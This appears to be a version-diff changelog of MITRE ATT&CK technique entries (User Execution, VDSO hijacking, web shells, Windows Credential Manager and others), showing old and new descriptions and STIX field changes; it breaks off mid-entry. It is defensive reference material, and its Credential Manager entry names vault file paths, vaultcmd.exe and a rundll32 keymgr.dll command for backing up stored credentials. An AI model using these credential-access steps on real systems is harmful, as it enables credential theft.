external_references{'source_name': 'Intezer App Service Phishing', 'description': 'Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.', 'url': 'https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/'}

[T1204] User Execution

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1An adversary may rely upon specific actions by a user in ordt1An adversary may rely upon specific actions by a user in ord
>er to gain execution. Users may be subjected to social engin>er to gain execution. Users may be subjected to social engin
>eering to get them to execute malicious code by, for example>eering to get them to execute malicious code by, for example
>, opening a malicious document file or link. These user acti>, opening a malicious document file or link. These user acti
>ons will typically be observed as follow-on behavior from fo>ons will typically be observed as follow-on behavior from fo
>rms of [Phishing](https://attack.mitre.org/techniques/T1566)>rms of [Phishing](https://attack.mitre.org/techniques/T1566)
>.  While [User Execution](https://attack.mitre.org/technique>.  While [User Execution](https://attack.mitre.org/technique
>s/T1204) frequently occurs shortly after Initial Access it m>s/T1204) frequently occurs shortly after Initial Access it m
>ay occur at other phases of an intrusion, such as when an ad>ay occur at other phases of an intrusion, such as when an ad
>versary places a file in a shared directory or on a user's d>versary places a file in a shared directory or on a user's d
>esktop hoping that a user will click on it. This activity ma>esktop hoping that a user will click on it. This activity ma
>y also be seen shortly after [Internal Spearphishing](https:>y also be seen shortly after [Internal Spearphishing](https:
>//attack.mitre.org/techniques/T1534).>//attack.mitre.org/techniques/T1534).  Adversaries may also 
 >deceive users into performing actions such as enabling [Remo
 >te Access Software](https://attack.mitre.org/techniques/T121
 >9), allowing direct control of the system to the adversary, 
 >or downloading and executing malware for [User Execution](ht
 >tps://attack.mitre.org/techniques/T1204). For example, tech 
 >support scams can be facilitated through [Phishing](https://
 >attack.mitre.org/techniques/T1566), vishing, or various form
 >s of user interaction. Adversaries can use a combination of 
 >these methods, such as spoofing and promoting toll-free numb
 >ers or call centers that are used to direct victims to malic
 >ious websites, to deliver and execute payloads containing ma
 >lware or [Remote Access Software](https://attack.mitre.org/t
 >echniques/T1219).(Citation: Telephone Attack Delivery)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_remote_supportFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-08-26 16:42:35.936000+00:002022-04-19 20:31:15.373000+00:00
descriptionAn adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
x_mitre_data_sources[0]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Instance: Instance StartProcess: Process Creation
x_mitre_data_sources[2]Instance: Instance CreationImage: Image Creation
x_mitre_data_sources[3]Image: Image CreationInstance: Instance Start
x_mitre_data_sources[4]Command: Command ExecutionApplication Log: Application Log Content
x_mitre_data_sources[5]Container: Container StartFile: File Creation
x_mitre_data_sources[6]Container: Container CreationCommand: Command Execution
x_mitre_data_sources[7]Network Traffic: Network Connection CreationContainer: Container Start
x_mitre_data_sources[8]Network Traffic: Network Traffic ContentNetwork Traffic: Network Connection Creation
x_mitre_data_sources[9]File: File CreationContainer: Container Creation
x_mitre_data_sources[10]Process: Process CreationInstance: Instance Creation
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Telephone Attack Delivery', 'description': 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery'}

[T1055.014] Process Injection: VDSO Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may inject malicious code into processes via VDSt1Adversaries may inject malicious code into processes via VDS
>O hijacking in order to evade process-based defenses as well>O hijacking in order to evade process-based defenses as well
> as possibly elevate privileges. Virtual dynamic shared obje> as possibly elevate privileges. Virtual dynamic shared obje
>ct (vdso) hijacking is a method of executing arbitrary code >ct (vdso) hijacking is a method of executing arbitrary code 
>in the address space of a separate live process.   VDSO hija>in the address space of a separate live process.   VDSO hija
>cking involves redirecting calls to dynamically linked share>cking involves redirecting calls to dynamically linked share
>d libraries. Memory protections may prevent writing executab>d libraries. Memory protections may prevent writing executab
>le code to a process via [Ptrace System Calls](https://attac>le code to a process via [Ptrace System Calls](https://attac
>k.mitre.org/techniques/T1055/008). However, an adversary may>k.mitre.org/techniques/T1055/008). However, an adversary may
> hijack the syscall interface code stubs mapped into a proce> hijack the syscall interface code stubs mapped into a proce
>ss from the vdso shared object to execute syscalls to open a>ss from the vdso shared object to execute syscalls to open a
>nd map a malicious shared object. This code can then be invo>nd map a malicious shared object. This code can then be invo
>ked by redirecting the execution flow of the process via pat>ked by redirecting the execution flow of the process via pat
>ched memory address references stored in a process' global o>ched memory address references stored in a process' global o
>ffset table (which store absolute addresses of mapped librar>ffset table (which store absolute addresses of mapped librar
>y functions).(Citation: ELF Injection May 2009) (Citation: B>y functions).(Citation: ELF Injection May 2009)(Citation: Ba
>acktrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall >cktrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 201
>2014)  Running code in the context of another process may al>4)  Running code in the context of another process may allow
>low access to the process's memory, system/network resources> access to the process's memory, system/network resources, a
>, and possibly elevated privileges. Execution via VDSO hijac>nd possibly elevated privileges. Execution via VDSO hijackin
>king may also evade detection from security products since t>g may also evade detection from security products since the 
>he execution is masked under a legitimate process.  >execution is masked under a legitimate process.  
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:28:45.232000+00:002022-07-07 17:09:09.048000+00:00
descriptionAdversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.
external_references[1]['source_name']ELF Injection May 2009Backtrace VDSO
external_references[1]['description']O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020.
external_references[1]['url']https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.htmlhttps://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/
external_references[2]['source_name']Backtrace VDSOSyscall 2014
external_references[2]['description']backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020.Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.
external_references[2]['url']https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/https://lwn.net/Articles/604515/
external_references[3]['source_name']VDSO Aug 2005GNU Acct
external_references[3]['description']Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.
external_references[3]['url']https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/https://www.gnu.org/software/acct/
external_references[4]['source_name']Syscall 2014RHEL auditd
external_references[4]['description']Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.
external_references[4]['url']https://lwn.net/Articles/604515/https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
external_references[6]['source_name']GNU AcctELF Injection May 2009
external_references[6]['description']GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.
external_references[6]['url']https://www.gnu.org/software/acct/https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html
external_references[7]['source_name']RHEL auditdVDSO Aug 2005
external_references[7]['description']Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.
external_references[7]['url']https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditinghttps://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/
x_mitre_data_sources[0]Process: OS API ExecutionModule: Module Load
x_mitre_data_sources[1]Module: Module LoadProcess: OS API Execution
x_mitre_detectionMonitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)(Citation: GNU Acct)(Citation: RHEL auditd)(Citation: Chokepoint preload rootkits) Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.
x_mitre_version1.01.1

[T1125] Video Capture

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-07-14 19:40:47.644000+00:002022-03-15 20:06:04.793000+00:00
x_mitre_data_sources[0]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: OS API Execution
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsLinux

[T1059.005] Command and Scripting Interpreter: Visual Basic

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may abuse Visual Basic (VB) for execution. VB ist1Adversaries may abuse Visual Basic (VB) for execution. VB is
> a programming language created by Microsoft with interopera> a programming language created by Microsoft with interopera
>bility with many Windows technologies such as [Component Obj>bility with many Windows technologies such as [Component Obj
>ect Model](https://attack.mitre.org/techniques/T1559/001) an>ect Model](https://attack.mitre.org/techniques/T1559/001) an
>d the [Native API](https://attack.mitre.org/techniques/T1106>d the [Native API](https://attack.mitre.org/techniques/T1106
>) through the Windows API. Although tagged as legacy with no>) through the Windows API. Although tagged as legacy with no
> planned future evolutions, VB is integrated and supported i> planned future evolutions, VB is integrated and supported i
>n the .NET Framework and cross-platform .NET Core.(Citation:>n the .NET Framework and cross-platform .NET Core.(Citation:
> VB .NET Mar 2020)(Citation: VB Microsoft)  Derivative langu> VB .NET Mar 2020)(Citation: VB Microsoft)  Derivative langu
>ages based on VB have also been created, such as Visual Basi>ages based on VB have also been created, such as Visual Basi
>c for Applications (VBA) and VBScript. VBA is an event-drive>c for Applications (VBA) and VBScript. VBA is an event-drive
>n programming language built into Microsoft Office, as well >n programming language built into Microsoft Office, as well 
>as several third-party applications.(Citation: Microsoft VBA>as several third-party applications.(Citation: Microsoft VBA
>)(Citation: Wikipedia VBA) VBA enables documents to contain >)(Citation: Wikipedia VBA) VBA enables documents to contain 
>macros used to automate the execution of tasks and other fun>macros used to automate the execution of tasks and other fun
>ctionality on the host. VBScript is a default scripting lang>ctionality on the host. VBScript is a default scripting lang
>uage on Windows hosts and can also be used in place of [Java>uage on Windows hosts and can also be used in place of [Java
>Script](https://attack.mitre.org/techniques/T1059/007) on HT>Script](https://attack.mitre.org/techniques/T1059/007) on HT
>ML Application (HTA) webpages served to Internet Explorer (t>ML Application (HTA) webpages served to Internet Explorer (t
>hough most modern browsers do not come with VBScript support>hough most modern browsers do not come with VBScript support
>).(Citation: Microsoft VBScript)  Adversaries may use VB pay>).(Citation: Microsoft VBScript)  Adversaries may use VB pay
>loads to execute malicious commands. Common malicious usage >loads to execute malicious commands. Common malicious usage 
>includes automating execution of behaviors with VBScript or >includes automating execution of behaviors with VBScript or 
>embedding VBA content into [Spearphishing Attachment](https:>embedding VBA content into [Spearphishing Attachment](https:
>//attack.mitre.org/techniques/T1566/001) payloads.>//attack.mitre.org/techniques/T1566/001) payloads (which may
 > also involve [Mark-of-the-Web Bypass](https://attack.mitre.
 >org/techniques/T1553/005) to enable execution).(Citation: De
 >fault VBS macros Blocking )
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-16 21:03:21.051000+00:002022-03-07 19:43:49.315000+00:00
descriptionAdversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Default VBS macros Blocking ', 'description': 'Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.', 'url': 'https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805'}

[T1505.003] Server Software Component: Web Shell

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may backdoor web servers with web shells to estat1Adversaries may backdoor web servers with web shells to esta
>blish persistent access to systems. A Web shell is a Web scr>blish persistent access to systems. A Web shell is a Web scr
>ipt that is placed on an openly accessible Web server to all>ipt that is placed on an openly accessible Web server to all
>ow an adversary to use the Web server as a gateway into a ne>ow an adversary to use the Web server as a gateway into a ne
>twork. A Web shell may provide a set of functions to execute>twork. A Web shell may provide a set of functions to execute
> or a command-line interface on the system that hosts the We> or a command-line interface on the system that hosts the We
>b server.  In addition to a server-side script, a Web shell >b server.(Citation: volexity_0day_sophos_FW)  In addition to
>may have a client interface program that is used to talk to > a server-side script, a Web shell may have a client interfa
>the Web server (ex: [China Chopper](https://attack.mitre.org>ce program that is used to talk to the Web server (e.g. [Chi
>/software/S0020) Web shell client).(Citation: Lee 2013) >na Chopper](https://attack.mitre.org/software/S0020) Web she
 >ll client).(Citation: Lee 2013)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['SYSTEM', 'User']
external_referencesCAPEC-650
values_changed
STIX FieldOld valueNew Value
modified2021-07-26 13:46:47.993000+00:002022-10-19 20:11:07.800000+00:00
descriptionAdversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW) In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)
external_references[1]['source_name']capecNSA Cyber Mitigating Web Shells
external_references[1]['url']https://capec.mitre.org/data/definitions/650.htmlhttps://github.com/nsacyber/Mitigating-Web-Shells
external_references[2]['source_name']Lee 2013volexity_0day_sophos_FW
external_references[2]['description']Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.htmlhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
external_references[3]['source_name']NSA Cyber Mitigating Web ShellsLee 2013
external_references[3]['description'] NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
external_references[3]['url']https://github.com/nsacyber/Mitigating-Web-Shellshttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
x_mitre_data_sources[1]File: File ModificationApplication Log: Application Log Content
x_mitre_data_sources[2]Process: Process CreationNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[3]Network Traffic: Network Traffic ContentProcess: Process Creation
x_mitre_data_sources[4]Network Traffic: Network Traffic FlowFile: File Modification
x_mitre_data_sources[5]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/650.html', 'external_id': 'CAPEC-650'}
x_mitre_platformsNetwork

[T1555.004] Credentials from Password Stores: Windows Credential Manager

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may acquire credentials from the Windows Credentt1Adversaries may acquire credentials from the Windows Credent
>ial Manager. The Credential Manager stores credentials for s>ial Manager. The Credential Manager stores credentials for s
>igning into websites, applications, and/or devices that requ>igning into websites, applications, and/or devices that requ
>est authentication through NTLM or Kerberos in Credential Lo>est authentication through NTLM or Kerberos in Credential Lo
>ckers (previously known as Windows Vaults).(Citation: Micros>ckers (previously known as Windows Vaults).(Citation: Micros
>oft Credential Manager store)(Citation: Microsoft Credential>oft Credential Manager store)(Citation: Microsoft Credential
> Locker)  The Windows Credential Manager separates website c> Locker)  The Windows Credential Manager separates website c
>redentials from application or network credentials in two lo>redentials from application or network credentials in two lo
>ckers. As part of [Credentials from Web Browsers](https://at>ckers. As part of [Credentials from Web Browsers](https://at
>tack.mitre.org/techniques/T1555/003), Internet Explorer and >tack.mitre.org/techniques/T1555/003), Internet Explorer and 
>Microsoft Edge website credentials are managed by the Creden>Microsoft Edge website credentials are managed by the Creden
>tial Manager and are stored in the Web Credentials locker. A>tial Manager and are stored in the Web Credentials locker. A
>pplication and network credentials are stored in the Windows>pplication and network credentials are stored in the Windows
> Credentials locker.  Credential Lockers store credentials i> Credentials locker.  Credential Lockers store credentials i
>n encrypted <code>.vcrd</code> files, located under <code>%S>n encrypted `.vcrd` files, located under `%Systemdrive%\User
>ystemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vaul>s\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`
>t/Credentials]\</code>. The encryption key can be found in a>. The encryption key can be found in a file named <code>Poli
> file named <code>Policy.vpol</code>, typically located in t>cy.vpol</code>, typically located in the same folder as the 
>he same folder as the credentials.(Citation: passcape Window>credentials.(Citation: passcape Windows Vault)(Citation: Mal
>s Vault)(Citation: Malwarebytes The Windows Vault)  Adversar>warebytes The Windows Vault)  Adversaries may list credentia
>ies may list credentials managed by the Windows Credential M>ls managed by the Windows Credential Manager through several
>anager through several mechanisms. <code>vaultcmd.exe</code>> mechanisms. <code>vaultcmd.exe</code> is a native Windows e
> is a native Windows executable that can be used to enumerat>xecutable that can be used to enumerate credentials stored i
>e credentials stored in the Credential Locker through a comm>n the Credential Locker through a command-line interface. Ad
>and-line interface. Adversaries may gather credentials by re>versaries may also gather credentials by directly reading fi
>ading files located inside of the Credential Lockers. Advers>les located inside of the Credential Lockers. Windows APIs, 
>aries may also abuse Windows APIs such as <code>CredEnumerat>such as <code>CredEnumerateA</code>, may also be absued to l
>eA</code> to list credentials managed by the Credential Mana>ist credentials managed by the Credential Manager.(Citation:
>ger.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimi> Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendenti
>katz Crendential Manager)  Adversaries may use password reco>al Manager)  Adversaries may also obtain credentials from cr
>very tools to obtain plain text passwords from the Credentia>edential backups. Credential backups and restorations may be
>l Manager.(Citation: Malwarebytes The Windows Vault)> performed by running <code>rundll32.exe keymgr.dll KRShowKe
 >yMgr</code> then selecting the “Back up...” button on the “S
 >tored User Names and Passwords” GUI.  Password recovery tool
 >s may also obtain plain text passwords from the Credential M
 >anager.(Citation: Malwarebytes The Windows Vault)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-04-29 21:00:18.973000+00:002022-10-21 15:46:55.929000+00:00
descriptionAdversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker) The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker. Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault) Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager) Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker) The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker. Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault) Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager) Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI. Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)
external_references[1]['source_name']Microsoft Credential Manager storeMalwarebytes The Windows Vault
